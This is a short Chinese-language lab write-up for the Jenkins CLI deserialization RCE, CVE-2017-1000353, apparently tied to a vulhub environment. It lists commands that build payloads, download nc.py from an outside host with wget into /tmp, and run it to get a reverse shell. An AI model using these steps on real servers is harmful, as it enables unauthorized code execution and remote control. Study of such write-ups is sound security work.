Skip to content

Latest commit

 

History

History
42 lines (25 loc) · 1.1 KB

CVE-2017-1000353.md

File metadata and controls

42 lines (25 loc) · 1.1 KB

Jenkins 命令执行漏洞(CVE-2017-1000353) by Vdeem

一、漏洞描述

Jenkins 未授权远程代码执行漏洞, 允许攻击者将序列化的 Java SignedObject 对象传输给 Jenkins CLI 处理,反序列化 ObjectInputStream 作为 Command 对象,这将绕过基于黑名单的保护机制, 导致代码执行。

二、利用流程

1 对应环境为 Jenkins 远程代码执行漏洞(CVE-2017-1000353)

2 利用工具https://github.com/vulhub/CVE-2017-1000353

3 执行命令生成字节码文件,“ ”处填可反弹 shell 文件地址

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "wget 1.1.1.1/nc.py -P /tmp"

4 发送数据包,执行命令,使文件下载到服务器

python exploit.py http://your-ip:8080 jenkins_poc.ser

5 生成字节码文件,“ ”处填写要执行的脚本

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "/bin/bash /tmp/nc.py"

6 发送数据包,执行脚本

python exploit.py http://your-ip:8080 jenkins_poc.ser

7 可反弹shell